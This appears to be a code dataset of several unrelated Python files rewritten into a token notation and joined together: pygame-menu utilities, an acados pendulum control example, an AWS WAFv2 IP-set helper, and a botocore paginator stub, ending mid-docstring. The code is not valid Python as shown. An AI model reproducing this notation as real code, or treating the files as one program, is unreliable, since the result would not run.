**kwargs<arrow>'pygame.Surface'<block_start>""" Loads an image and returns a surface. :param image_path: Image file :param kwargs: Optional keyword arguments :return: Surface """<line_sep># Try to load the image <try_stmt><block_start><if_stmt>'test'<in>kwargs.keys()<block_start><raise>pygame.error('File is not a Windows BMP file')<block_end>surface=pygame.image.load(image_path)<block_end><except_stmt>pygame.error<as>exc# Check if file is not a windows file <block_start><if_stmt>str(exc)<eq>'File is not a Windows BMP file'<block_start>pil_invalid_exception=Exception<line_sep># Check if Pillow exists <try_stmt># noinspection PyPackageRequirements <block_start><import_from_stmt>PIL Image UnidentifiedImageError<line_sep>pil_invalid_exception=UnidentifiedImageError<line_sep>img_pil=Image.open(image_path)<line_sep>surface=pygame.image.fromstring(img_pil.tobytes() img_pil.size img_pil.mode).convert()<block_end><except_stmt>(ModuleNotFoundError ImportError)<block_start>warn(f'Image file "{image_path}" could not be loaded, as pygame.error '<concat>f'is raised. To avoid this issue install the Pillow library')<line_sep><raise><block_end><except_stmt>pil_invalid_exception<block_start>warn(f'The image "{image_path}" could not be loaded using Pillow')<line_sep><raise><block_end><block_end><else_stmt><block_start><raise><block_end><block_end><return>surface<block_end><def_stmt>make_surface width:NumberType height:NumberType alpha:bool=<false> fill_color:Optional[ColorInputType]=<none><arrow>'pygame.Surface'<block_start>""" Creates a pygame surface object. :param width: Surface width :param height: Surface height :param alpha: Enable alpha channel on surface :param fill_color: Fill surface with a certain color :return: Pygame surface """<assert_stmt>isinstance(width NumberInstance)<assert_stmt>isinstance(height NumberInstance)<assert_stmt>isinstance(alpha bool)<assert_stmt>width<ge>0<and>height<ge>0 'surface width and height must be equal or greater than zero'<line_sep>surface=pygame.Surface((int(width) int(height)) pygame.SRCALPHA 32)# lgtm [py/call/wrong-arguments] <if_stmt>alpha# noinspection PyArgumentList <block_start>surface=pygame.Surface.convert_alpha(surface)<block_end><if_stmt>fill_color<is><not><none><block_start>fill_color=assert_color(fill_color)<line_sep>surface.fill(fill_color)<block_end><return>surface<block_end><def_stmt>mouse_motion_current_mouse_position <arrow>EventType<block_start>""" Return a pygame event type MOUSEMOTION in the current mouse position. :return: Event """<line_sep>x,y=pygame.mouse.get_pos()<line_sep><return>pygame.event.Event(pygame.MOUSEMOTION {'pos':(int(x) int(y))})<block_end><def_stmt>parse_padding padding:PaddingType<arrow>Tuple4IntType<block_start>""" Get the padding value from tuple. - If an integer or float is provided: top, right, bottom and left values will be the same - If 2-item tuple is provided: top and bottom takes the first value, left and right the second - If 3-item tuple is provided: top will take the first value, left and right the second, and bottom the third - If 4-item tuple is provided: padding will be (top, right, bottom, left) .. note:: See `CSS W3Schools <https://www.w3schools.com/css/css_padding.asp>`_ for more info about padding. :param padding: Can be a single number, or a tuple of 2, 3 or 4 elements following CSS style :return: Padding value, (top, right, bottom, left), in px """<if_stmt>padding<is><false><or><none><block_start>padding=0<block_end><assert_stmt>isinstance(padding PaddingInstance)<if_stmt>isinstance(padding NumberInstance)<block_start><assert_stmt>padding<ge>0 'padding cannot be a negative number'<line_sep><return>int(padding) int(padding) int(padding) int(padding)<block_end><else_stmt><block_start><assert_stmt>1<le>len(padding)<le>4 'padding must be a tuple of 2, 3 or 4 elements'<for_stmt>i range(len(padding))<block_start><assert_stmt>isinstance(padding[i] NumberInstance) 'all padding elements must be integers or floats'<assert_stmt>padding[i]<ge>0 'all padding elements must be equal or greater than zero'<block_end><if_stmt>len(padding)<eq>1<block_start><return>int(padding[0]) int(padding[0]) int(padding[0]) int(padding[0])<block_end><elif_stmt>len(padding)<eq>2<block_start><return>int(padding[0]) int(padding[1]) int(padding[0]) int(padding[1])<block_end><elif_stmt>len(padding)<eq>3<block_start><return>int(padding[0]) int(padding[1]) int(padding[2]) int(padding[1])<block_end><else_stmt><block_start><return>int(padding[0]) int(padding[1]) int(padding[2]) int(padding[3])<block_end><block_end><block_end><def_stmt>print_menu_widget_structure widgets:List['pygame_menu.widgets.Widget'] index:int<arrow><none><block_start>""" Test printing widgets order. .. note:: - Φ Floating status - ⇇ Selected - !▲ Widget is not appended to current menu - ╳ Widget is hidden - ∑ Scrollable frame sizing - β Widget is not selectable - {x,y} Widget *column, row* position - <x,y> Frame indices (min, max) :param widgets: Menu widgets list :param index: Menu index :return: None """<line_sep>indx=0<line_sep>current_depth=0<line_sep>depth_widths={}<line_sep>c=TerminalColors<def_stmt>close_frames depth:int<arrow><none><block_start>""" Close frames up to current depth. :param depth: Depth to close :return: None """<line_sep>d=current_depth-depth<for_stmt>i range(d)<block_start>j=depth+d-(i+1)# Current depth line=f'· {"│ "<times>j}└{"┄"<times>3}'# * depth_widths[j] print(c.BRIGHT_WHITE+line.ljust(0 '━')+c.ENDC)<block_end><block_end># 80 also work non_menu_frame_widgets:Dict[int List['pygame_menu.widgets.Widget']]={}<def_stmt>process_non_menu_frame w_indx:int<arrow><none><block_start>""" Print non-menu frames list. :param w_indx: Current iteration index to print widgets :return: None """<for_stmt>nmi list(non_menu_frame_widgets.keys())<block_start><if_stmt>nmi<eq>w_indx<block_start>v=non_menu_frame_widgets[nmi]<for_stmt>v_wid v<block_start>print(c.BRIGHT_WHITE+'· '+'│ '<times>v_wid.get_frame_depth()+c.ENDC+widget_terminal_title(v_wid))<block_end><del_stmt>non_menu_frame_widgets[nmi]<block_end><block_end><block_end><for_stmt>w widgets<block_start>w_depth=w.get_frame_depth()<line_sep>close_frames(w.get_frame_depth())<line_sep>title=widget_terminal_title(w indx index)<line_sep>print('{0}{1}{2}'.format(str(indx).ljust(3) ' '+c.BRIGHT_WHITE+'│ '<times>w_depth+c.ENDC title))<if_stmt>w_depth<not><in>depth_widths.keys()<block_start>depth_widths[w_depth]=0<block_end># depth_widths[w_depth] = max(int(len(title) * 1.2) + 3, depth_widths[w_depth]) depth_widths[w_depth]=len(title)-2<line_sep>current_depth=w.get_frame_depth()<line_sep>process_non_menu_frame(indx)<line_sep>jw=widgets[0]<try_stmt><block_start><if_stmt>isinstance(w pygame_menu.widgets.Frame)# Print ordered non-menu widgets <block_start>current_depth<augadd>1<line_sep>prev_indx=indx<for_stmt>jw w.get_widgets(unpack_subframes=<false>)<block_start><if_stmt>jw.get_menu()<is><none><or>jw<not><in>widgets<block_start><if_stmt>prev_indx<not><in>non_menu_frame_widgets.keys()<block_start>non_menu_frame_widgets[prev_indx]=[]<block_end>non_menu_frame_widgets[prev_indx].append(jw)<block_end><else_stmt><block_start>prev_indx=widgets.index(jw)<block_end><block_end><block_end><block_end><except_stmt>ValueError<as>e<block_start>print(f'[ERROR] while requesting widget {jw.get_class_id()}')<line_sep>warn(str(e))<block_end>indx<augadd>1<block_end>process_non_menu_frame(indx)<line_sep>close_frames(0)<block_end><def_stmt>set_pygame_cursor cursor:CursorInputType<arrow><none><block_start>""" Set pygame cursor. :param cursor: Cursor object :return: None """<try_stmt><block_start><if_stmt>cursor<is><not><none># noinspection PyArgumentList <block_start>pygame.mouse.set_cursor(cursor)<block_end><block_end><except_stmt>(pygame.error TypeError)<block_start><if_stmt>PYGAME_V2<block_start>warn(f'could not establish widget cursor, invalid value {cursor}')<block_end><block_end><block_end><def_stmt>uuid4 short:bool=<false><arrow>str<block_start>""" Create custom version of uuid4. :param short: If ``True`` only returns the first 8 chars of the uuid, else, 18 :return: UUID of 18 chars """<line_sep><return>str(uuid.uuid4())[:18<if><not>short<else>8]<block_end><def_stmt>warn message:str print_stack:bool=<true><arrow><none><block_start>""" Warnings warn method. :param message: Message to warn about :param print_stack: Print stack trace of the call :return: None """<assert_stmt>isinstance(message str)<line_sep># noinspection PyUnresolvedReferences,PyProtectedMember frame=sys._getframe().f_back<line_sep># frame_info = inspect.getframeinfo(frame) # Traceback(filename, lineno, function, code_context, index) # Check if message in dict msg_hash=hash(message)<line_sep>msg_in_hash=<false><try_stmt><block_start>msg_in_hash=WARNINGS_LAST_MESSAGES[msg_hash]<block_end><except_stmt>KeyError<block_start><pass><block_end><if_stmt><not>msg_in_hash<and>print_stack<block_start>traceback.print_stack(frame limit=5)<line_sep>WARNINGS_LAST_MESSAGES[msg_hash]=<true><block_end># warnings.showwarning(message, UserWarning, frame_info[0], frame_info[1]) warnings.warn(message stacklevel=2)<block_end><def_stmt>widget_terminal_title widget:'pygame_menu.widgets.Widget' widget_index:int=-1 current_index:int=-1<arrow>str<block_start>""" Return widget title to be printed on terminals. :param widget: Widget to get title from :param widget_index: Widget index :param current_index: Menu index :return: Widget title """<line_sep>w_class_id=TerminalColors.BOLD+widget.get_class_id()+TerminalColors.ENDC<if_stmt>isinstance(widget pygame_menu.widgets.Frame)<block_start>w_title=TerminalColors.BRIGHT_WHITE+'┌━'+TerminalColors.ENDC<line_sep>w_title<augadd>f'{0} - {3}[{1},{2},'.format(w_class_id *widget.get_indices() TerminalColors.LGREEN)<if_stmt>widget.horizontal<block_start>w_title<augadd>'H] '<block_end><else_stmt><block_start>w_title<augadd>'V] '<block_end><if_stmt>widget.is_scrollable<block_start>wsz=widget.get_inner_size()<line_sep>wsm=widget.get_max_size()<line_sep>wsh=wsm[0]<if>wsm[0]<eq>wsz[0]<else>f'{wsm[0]}→{wsz[0]}'<line_sep>wsv=wsm[1]<if>wsm[1]<eq>wsz[1]<else>f'{wsm[1]}→{wsz[1]}'<line_sep>w_title<augadd>f'∑ [{wsh},{wsv}] '<block_end>w_title<augadd>TerminalColors.ENDC<block_end><else_stmt><block_start><if_stmt>widget.get_title()<ne>''<block_start>title_f=TerminalColors.UNDERLINE+widget.get_title()+TerminalColors.ENDC<line_sep>w_title=f'{w_class_id} - {title_f} - '<block_end><else_stmt><block_start>w_title=w_class_id+' - '<block_end><block_end># Column/Row position w_title<augadd>TerminalColors.INDIGO<line_sep>cr=widget.get_col_row_index()<line_sep>w_title<augadd>'{'+str(cr[0])+','+str(cr[1])+'}'<line_sep>w_title<augadd>TerminalColors.ENDC<line_sep># Add position w_title<augadd>TerminalColors.MAGENTA<line_sep>w_title<augadd>' ({0},{1})'.format(*widget.get_position())<line_sep>w_title<augadd>TerminalColors.ENDC<line_sep># Add size w_title<augadd>TerminalColors.BLUE<line_sep>w_title<augadd>' ({0},{1})'.format(*widget.get_size())<line_sep>w_title<augadd>TerminalColors.ENDC<line_sep># Add mods w_title<augadd>TerminalColors.CYAN<if_stmt>widget.is_floating()<block_start>w_title<augadd>' Φ'<block_end><if_stmt><not>widget.is_visible()<block_start>w_title<augadd>' ╳'<block_end><if_stmt><not>widget.is_selectable<block_start>w_title<augadd>' β'<block_end><if_stmt>widget.is_selected()<block_start>w_title<augadd>TerminalColors.BOLD+' ⟵'<if_stmt>current_index<ne>-1<and>current_index<ne>widget_index<block_start>w_title<augadd>f'! [{widget_index}->{current_index}]'<block_end><block_end><if_stmt>widget.get_menu()<is><none><block_start>w_title<augadd>' !▲'<block_end>w_title<augadd>TerminalColors.ENDC<line_sep><return>w_title<block_end><class_stmt>TerminalColors(object)<block_start>""" Terminal colors. See https://www.lihaoyi.com/post/BuildyourownCommandLinewithANSIescapecodes.html. """<line_sep>BLUE='\u001b[38;5;27m'<line_sep>BOLD='\033[1m'<line_sep>BRIGHT_MAGENTA='\u001b[35;1m'<line_sep>BRIGHT_WHITE='\u001b[37;1m'<line_sep>CYAN='\u001b[36m'<line_sep>ENDC='\u001b[0m'<line_sep>GRAY='\u001b[30;1m'<line_sep>INDIGO='\u001b[38;5;129m'<line_sep>LGREEN='\u001b[38;5;150m'<line_sep>MAGENTA='\u001b[35m'<line_sep>RED='\u001b[31m'<line_sep>UNDERLINE='\033[4m'<block_end>
# Minimal example showing how to reuse the exported c-code with # different time-steps. # # There are two use-cases demonstrated here. One use-case is to change # the length of the time-stamp vector (this results in a different # N). Another use-case is to change the final time but keep the number # of shooting nodes identical. Reusing the exported code with variing # N can be useful especially in a c-only application where the process # of code-generation should only be done once. # # This example is an extension of the 'minimal_example_ocp.py' example. # # Copyright 2021 <NAME>, <NAME>, <NAME>, # <NAME>, <NAME>, <NAME>, <NAME>, # <NAME>, <NAME>, <NAME>, <NAME>, # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, # <NAME> # # This file is part of acados. # # The 2-Clause BSD License # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE.; # <import_stmt>os<import_stmt>sys<line_sep>sys.path.insert(0 '../common')<import_from_stmt>acados_template AcadosOcp AcadosOcpSolver<import_from_stmt>pendulum_model export_pendulum_ode_model<import_stmt>numpy<as>np<import_stmt>scipy.linalg<import_from_stmt>utils plot_pendulum<line_sep>print('This example demonstrates 2 use-cases for reuse of the code export.')<line_sep># create ocp object to formulate the OCP ocp=AcadosOcp()<line_sep># set model model=export_pendulum_ode_model()<line_sep>ocp.model=model<line_sep>nx=model.x.size()[0]<line_sep>nu=model.u.size()[0]<line_sep>ny=nx+nu<line_sep>ny_e=nx<line_sep># define the different options for the use-case demonstration N0=20# original number of shooting nodes N12=15# change the number of shooting nodes for use-cases 1 and 2 Tf_01=1.0# original final time and for use-case 1 Tf_2=Tf_01<times>0.7# change final time for use-case 2 (but keep N identical) # set dimensions ocp.dims.N=N0<line_sep># set cost Q=2<times>np.diag([1e3 1e3 1e-2 1e-2])<line_sep>R=2<times>np.diag([1e-2])<line_sep>ocp.cost.W_e=Q<line_sep>ocp.cost.W=scipy.linalg.block_diag(Q R)<line_sep>ocp.cost.cost_type='LINEAR_LS'<line_sep>ocp.cost.cost_type_e='LINEAR_LS'<line_sep>ocp.cost.Vx=np.zeros((ny nx))<line_sep>ocp.cost.Vx[:nx :nx]=np.eye(nx)<line_sep>Vu=np.zeros((ny nu))<line_sep>Vu[4 0]=1.0<line_sep>ocp.cost.Vu=Vu<line_sep>ocp.cost.Vx_e=np.eye(nx)<line_sep>ocp.cost.yref=np.zeros((ny ))<line_sep>ocp.cost.yref_e=np.zeros((ny_e ))<line_sep># set constraints Fmax=80<line_sep>ocp.constraints.lbu=np.array([-Fmax])<line_sep>ocp.constraints.ubu=np.array([+Fmax])<line_sep>ocp.constraints.idxbu=np.array([0])<line_sep>ocp.constraints.x0=np.array([0.0 np.pi 0.0 0.0])<line_sep># set options ocp.solver_options.qp_solver='PARTIAL_CONDENSING_HPIPM'# FULL_CONDENSING_QPOASES # PARTIAL_CONDENSING_HPIPM, FULL_CONDENSING_QPOASES, FULL_CONDENSING_HPIPM, # PARTIAL_CONDENSING_QPDUNES, PARTIAL_CONDENSING_OSQP ocp.solver_options.hessian_approx='GAUSS_NEWTON'<line_sep>ocp.solver_options.integrator_type='ERK'<line_sep># ocp.solver_options.print_level = 1 ocp.solver_options.nlp_solver_type='SQP'# SQP_RTI, SQP # set prediction horizon ocp.solver_options.tf=Tf_01<line_sep>print(80<times>'-')<line_sep>print('generate code and compile...')<line_sep>ocp_solver=AcadosOcpSolver(ocp json_file='acados_ocp.json')<line_sep># -------------------------------------------------------------------------------- # 0) solve the problem defined here (original from code export), analog to 'minimal_example_ocp.py' simX0=np.ndarray((N0+1 nx))<line_sep>simU0=np.ndarray((N0 nu))<line_sep>print(80<times>'-')<line_sep>print(f'solve original code with N = {N0} and Tf = {Tf_01} s:')<line_sep>status=ocp_solver.solve()<if_stmt>status<ne>0<block_start>ocp_solver.print_statistics()# encapsulates: stat = ocp_solver.get_stats("statistics") <raise>Exception('acados returned status {}. Exiting.'.format(status))<block_end># get solution <for_stmt>i range(N0)<block_start>simX0[i :]=ocp_solver.get(i "x")<line_sep>simU0[i :]=ocp_solver.get(i "u")<block_end>simX0[N0 :]=ocp_solver.get(N0 "x")<line_sep>ocp_solver.print_statistics()# encapsulates: stat = ocp_solver.get_stats("statistics") # plot but don't halt plot_pendulum(np.linspace(0 Tf_01 N0+1) Fmax simU0 simX0 latexify=<false> plt_show=<false> X_true_label=f'original: N={N0}, Tf={Tf_01}')<line_sep># -------------------------------------------------------------------------------- # 1) now reuse the code but set a new time-steps vector, with a new number of elements dt1=Tf_01/N12<line_sep>new_time_steps1=np.tile(dt1 (N12 ))# Matlab's equivalent to repmat time1=np.hstack([0 np.cumsum(new_time_steps1)])<line_sep>simX1=np.ndarray((N12+1 nx))<line_sep>simU1=np.ndarray((N12 nu))<line_sep>ocp_solver.set_new_time_steps(new_time_steps1)<line_sep>print(80<times>'-')<line_sep>print(f'solve use-case 1 with N = {N12} (instead of {N0}) and Tf = {Tf_01} s:')<line_sep>status=ocp_solver.solve()<if_stmt>status<ne>0<block_start>ocp_solver.print_statistics()# encapsulates: stat = ocp_solver.get_stats("statistics") <raise>Exception('acados returned status {}. Exiting.'.format(status))<block_end># get solution <for_stmt>i range(N12)<block_start>simX1[i :]=ocp_solver.get(i "x")<line_sep>simU1[i :]=ocp_solver.get(i "u")<block_end>simX1[N12 :]=ocp_solver.get(N12 "x")<line_sep>ocp_solver.print_statistics()# encapsulates: stat = ocp_solver.get_stats("statistics") plot_pendulum(time1 Fmax simU1 simX1 latexify=<false> plt_show=<false> X_true_label=f'use-case 1: N={N12}')<line_sep># -------------------------------------------------------------------------------- # 2) reuse the code again, set a new time-steps vector, only with a different final time dt2=Tf_2/N12<line_sep>new_time_steps2=np.tile(dt2 (N12 ))# Matlab's equivalent to repmat time2=np.hstack([0 np.cumsum(new_time_steps2)])<line_sep>simX2=np.ndarray((N12+1 nx))<line_sep>simU2=np.ndarray((N12 nu))<line_sep>ocp_solver.set_new_time_steps(new_time_steps2)<line_sep>print(80<times>'-')<line_sep>print(f'solve use-case 2 with N = {N12} and Tf = {Tf_2} s (instead of {Tf_01} s):')<line_sep>status=ocp_solver.solve()<if_stmt>status<ne>0<block_start>ocp_solver.print_statistics()# encapsulates: stat = ocp_solver.get_stats("statistics") <raise>Exception('acados returned status {}. Exiting.'.format(status))<block_end># get solution <for_stmt>i range(N12)<block_start>simX2[i :]=ocp_solver.get(i "x")<line_sep>simU2[i :]=ocp_solver.get(i "u")<block_end>simX2[N12 :]=ocp_solver.get(N12 "x")<line_sep>ocp_solver.print_statistics()# encapsulates: stat = ocp_solver.get_stats("statistics") plot_pendulum(time2 Fmax simU2 simX2 latexify=<false> plt_show=<true> X_true_label=f'use-case 2: Tf={Tf_2} s')<line_sep>
###################################################################################################################### # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # # with the License. A copy of the License is located at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES # # OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions # # and limitations under the License. # ###################################################################################################################### # import boto3 # from botocore.config import Config <import_from_stmt>botocore.exceptions ClientError<import_from_stmt>ipaddress ip_address<import_from_stmt>backoff on_exception expo full_jitter<import_from_stmt>lib.boto3_util create_client<line_sep>API_CALL_NUM_RETRIES=5<line_sep>MAX_TIME=20<line_sep>client=create_client('wafv2')<class_stmt>WAFLIBv2(object)<block_start><def_stmt>__init__ self<block_start><return><block_end># Parse arn into ip_set_id <def_stmt>arn_to_id self arn<block_start><if_stmt>arn<eq><none><block_start><return><none><block_end>tmp=arn.split('/')<line_sep><return>tmp.pop()<block_end># Determine network version for source_ip <def_stmt>which_ip_version self log source_ip<block_start><if_stmt>source_ip<eq><none><block_start><return><none><block_end><try_stmt><block_start>source_ip=source_ip.strip()<line_sep>ip_type="IPV%s"%ip_address(source_ip).version<line_sep><return>ip_type<block_end><except_stmt>Exception<as>e<block_start>log.error("Source ip %s is not IPV4 or IPV6." str(source_ip))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Append correct cidr to source_ip <def_stmt>set_ip_cidr self log source_ip<block_start><if_stmt>source_ip<eq><none><block_start><return><none><block_end><try_stmt><block_start>source_ip=source_ip.strip()<line_sep>ip_type="IPV%s"%ip_address(source_ip).version<block_end><except_stmt>Exception<as>e<block_start>log.error("Source ip %s is not IPV4 or IPV6." str(source_ip))<line_sep>log.error(str(e))<line_sep><return><none><block_end>ip_class="32"<if>ip_type<eq>"IPV4"<else>"128"<line_sep><return>str(source_ip)+"/"+str(ip_class)<block_end># Retrieve IPSet given an ip_set_id <def_stmt>get_ip_set_by_id self log scope name ip_set_id<block_start><try_stmt><block_start>log.debug("[waflib:get_ip_set_by_id] Start")<line_sep>response=client.get_ip_set(Scope=scope Name=name Id=ip_set_id)<line_sep>log.debug("[waflib:get_ip_set_by_id] got ip set: \n{}.".format(response))<line_sep>log.debug("[waflib:get_ip_set_by_id] End")<line_sep><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("[waflib:get_ip_set_by_id] Failed to get IPSet %s" str(ip_set_id))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Retrieve IPSet given an ip set arn @on_exception(expo client.exceptions.WAFInternalErrorException max_time=MAX_TIME)<def_stmt>get_ip_set self log scope name arn<block_start><try_stmt><block_start>log.info("[waflib:get_ip_set] Start")<line_sep>ip_set_id=self.arn_to_id(arn)<line_sep>response=client.get_ip_set(Scope=scope Name=name Id=ip_set_id)<line_sep>log.info("[waflib:get_ip_set] End")<line_sep><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to get IPSet %s" str(ip_set_id))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Retrieve addresses based on ip_set_id @on_exception(expo client.exceptions.WAFInternalErrorException max_time=MAX_TIME)<def_stmt>get_addresses self log scope name arn<block_start><try_stmt><block_start>response=self.get_ip_set(log scope name arn)<line_sep>addresses=response["IPSet"]["Addresses"]<line_sep><return>addresses<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to get addresses for ARN %s" str(arn))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Update addresses in an IPSet using ip set id @on_exception(expo client.exceptions.WAFOptimisticLockException max_time=MAX_TIME jitter=full_jitter max_tries=API_CALL_NUM_RETRIES)<def_stmt>update_ip_set_by_id self log scope name ip_set_id addresses lock_token description<block_start>log.debug("[waflib:update_ip_set_by_id] Start")<try_stmt><block_start>response=client.update_ip_set(Scope=scope Name=name Id=ip_set_id Addresses=addresses LockToken=lock_token Description=description)<line_sep>log.debug("[waflib:update_ip_set_by_id] update ip set response: \n{}.".format(response))<line_sep>log.debug("[waflib:update_ip_set_by_id] End")<line_sep><return>response<block_end># Get the latest ip set and retry updating api call when OptimisticLockException occurs <except_stmt>ClientError<as>ex<block_start>exception_type=ex.response['Error']['Code']<if_stmt>exception_type<in>['OptimisticLockException']<block_start>log.info("[waflib:update_ip_set_by_id] OptimisticLockException detected. Get the latest ip set and retry updating ip set.")<line_sep>ip_set=self.get_ip_set_by_id(log scope name ip_set_id)<line_sep>lock_token=ip_set['LockToken']<line_sep>response=client.update_ip_set(Scope=scope Name=name Id=ip_set_id Addresses=addresses LockToken=lock_token Description=description)<line_sep>log.debug("[waflib:update_ip_set_id] End")<line_sep><return>response<block_end><block_end><except_stmt>Exception<as>e<block_start>log.error(e)<line_sep>log.error("[waflib:update_ip_set_by_id] Failed to update IPSet: %s" str(ip_set_id))<line_sep><return><none><block_end><block_end># Update addresses in an IPSet using ip set arn @on_exception(expo client.exceptions.WAFOptimisticLockException max_time=MAX_TIME jitter=full_jitter max_tries=API_CALL_NUM_RETRIES)<def_stmt>update_ip_set self log scope name ip_set_arn addresses<block_start>log.info("[waflib:update_ip_set] Start")<if_stmt>(ip_set_arn<is><none><or>name<is><none>)<block_start>log.error("No IPSet found for: %s " str(ip_set_arn))<line_sep><return><none><block_end><try_stmt># convert from arn to ip_set_id <block_start>ip_set_id=self.arn_to_id(ip_set_arn)<line_sep># retrieve the ipset to get a locktoken ip_set=self.get_ip_set(log scope name ip_set_arn)<line_sep>lock_token=ip_set['LockToken']<line_sep>description=ip_set['IPSet']['Description']<line_sep>log.info("Updating IPSet with description: %s, lock token: %s" str(description) str(lock_token))<line_sep>response=client.update_ip_set(Scope=scope Name=name Description=description Id=ip_set_id Addresses=addresses LockToken=lock_token)<line_sep>new_ip_set=self.get_ip_set(log scope name ip_set_id)<line_sep>log.debug("[waflib:update_ip_set] update ip set response:\n{}".format(response))<line_sep>log.info("[waflib:update_ip_set] End")<line_sep><return>new_ip_set<block_end><except_stmt>Exception<as>e<block_start>log.error(e)<line_sep>log.error("Failed to update IPSet: %s" str(ip_set_id))<line_sep><return><none><block_end><block_end># Put Log Configuration for webacl @on_exception(expo client.exceptions.WAFInternalErrorException max_time=MAX_TIME)<def_stmt>put_logging_configuration self log web_acl_arn delivery_stream_arn<block_start><try_stmt><block_start>response=client.put_logging_configuration(LoggingConfiguration={'ResourceArn':web_acl_arn 'LogDestinationConfigs':[delivery_stream_arn]})<line_sep><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to configure log for WebAcl: %s" str(web_acl_arn))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Delete Log Configuration for webacl @on_exception(expo client.exceptions.WAFInternalErrorException max_time=MAX_TIME)<def_stmt>delete_logging_configuration self log web_acl_arn<block_start><try_stmt><block_start>response=client.delete_logging_configuration(ResourceArn=web_acl_arn)<line_sep><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to delete log for WebAcl: %s" str(web_acl_arn))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># List webacls @on_exception(expo client.exceptions.WAFInternalErrorException max_time=MAX_TIME)<def_stmt>list_web_acls self log scope<block_start><try_stmt><block_start>response=client.list_web_acls(Scope=scope)<line_sep><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to list WebAcld in scope: %s" str(scope))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># log when retry is stopped # def give_up_retry(self, log, e): # log.error("Giving up retry after %s times.",str(API_CALL_NUM_RETRIES)) # log.error(e) ################################################################# # Following functions only used for testing, not in WAF Solution ################################################################# @on_exception(expo (client.exceptions.WAFInternalErrorException client.exceptions.WAFOptimisticLockException client.exceptions.WAFLimitsExceededException) max_time=MAX_TIME)<def_stmt>create_ip_set self log scope name description version addresses<block_start><try_stmt><block_start>response=client.create_ip_set(Scope=scope Name=name Description=description IPAddressVersion=version Addresses=addresses)<line_sep><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to create IPSet: %s" str(name))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end>@on_exception(expo (client.exceptions.WAFInternalErrorException client.exceptions.WAFOptimisticLockException client.exceptions.WAFAssociatedItemException) max_time=MAX_TIME)<def_stmt>delete_ip_set self log scope name ip_set_id<block_start><try_stmt><block_start>response=self.get_ip_set(log scope name ip_set_id)<if_stmt>response<is><not><none><block_start>lock_token=response['LockToken']<line_sep>response=client.delete_ip_set(Scope=scope Name=name LockToken=lock_token Id=ip_set_id)<block_end><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to delete IPSet: %s" str(name))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end>@on_exception(expo client.exceptions.WAFInternalErrorException max_time=MAX_TIME)<def_stmt>list_ip_sets self log scope marker=<none><block_start><try_stmt><block_start>response=<none><if_stmt>marker<eq><none><block_start>response=client.list_ip_sets(Scope=scope Limit=50)<block_end><else_stmt><block_start>response=client.list_ip_sets(Scope=scope NextMarker=marker Limit=50)<block_end><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to list IPSets in scope: %s" str(scope))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end><block_end>
<import_from_stmt>typing Dict<import_from_stmt>typing List<import_from_stmt>botocore.paginate Paginator<class_stmt>DescribeObjects(Paginator)<block_start><def_stmt>paginate self pipelineId:str objectIds:List evaluateExpressions:bool=<none> PaginationConfig:Dict=<none><arrow>Dict<block_start>""" Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.describe_objects`. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/DescribeObjects>`_ **Request Syntax** :: response_iterator = paginator.paginate( pipelineId='string', objectIds=[ 'string', ], evaluateExpressions=True|False, PaginationConfig={ 'MaxItems': 123, 'PageSize': 123, 'StartingToken': 'string' } ) **Response Syntax** :: { 'pipelineObjects': [ { 'id': 'string', 'name': 'string', 'fields': [ { 'key': 'string', 'stringValue': 'string', 'refValue': 'string' }, ] }, ], 'hasMoreResults': True|False, 'NextToken': 'string' } **Response Structure** - *(dict) --* Contains the output of DescribeObjects. - **pipelineObjects** *(list) --* An array of object definitions. - *(dict) --* Contains information about a pipeline object. This can be a logical, physical, or physical attempt pipeline object. The complete set of components of a pipeline defines the pipeline. - **id** 